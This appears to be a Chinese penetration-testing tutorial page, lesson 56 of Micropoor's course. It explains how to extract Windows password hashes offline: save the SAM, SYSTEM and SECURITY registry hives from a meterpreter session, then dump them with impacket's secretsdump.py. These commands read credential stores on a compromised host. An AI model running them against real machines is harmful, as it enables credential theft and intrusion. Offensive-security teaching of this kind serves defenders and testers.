首页
论坛
课程
招聘
《高级持续渗透》
第五十六课:离线提取目标机hash
专注APT攻击与防御
https://micropoor.blogspot.com/

很多环境下,不允许上传或者使用mimikatz。而针对非域控的单机离线提取hash显得尤为重要。
在meterpreter shell命令切到交互式cmd命令。
reg save 方式使得需要下载的目标机hash文件更小。

reg save HKLMSYSTEM sys.hiv
reg save HKLMSAM sam.hiv
reg save hklmsecurity security.hiv
meterpreter下自带download功能。
离线提取:

本季用到的是impacket的 secretsdump.py。Kali默认路径:/root/impacket/examples/secretsdump.py命令如下:
1 root@John:/tmp# python /root/impacket/examples/secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL
Micropoor

上一节 :
下一节 :
章节评论 (0)
域名:加速乐 | SSL证书:亚洲诚信 | 安全网易易盾| 同盾反欺诈| 服务器:绿盟科技
©2000 - 2020 看雪学院 / 沪ICP备16048531号-1 / 沪公网安备 31011502006611号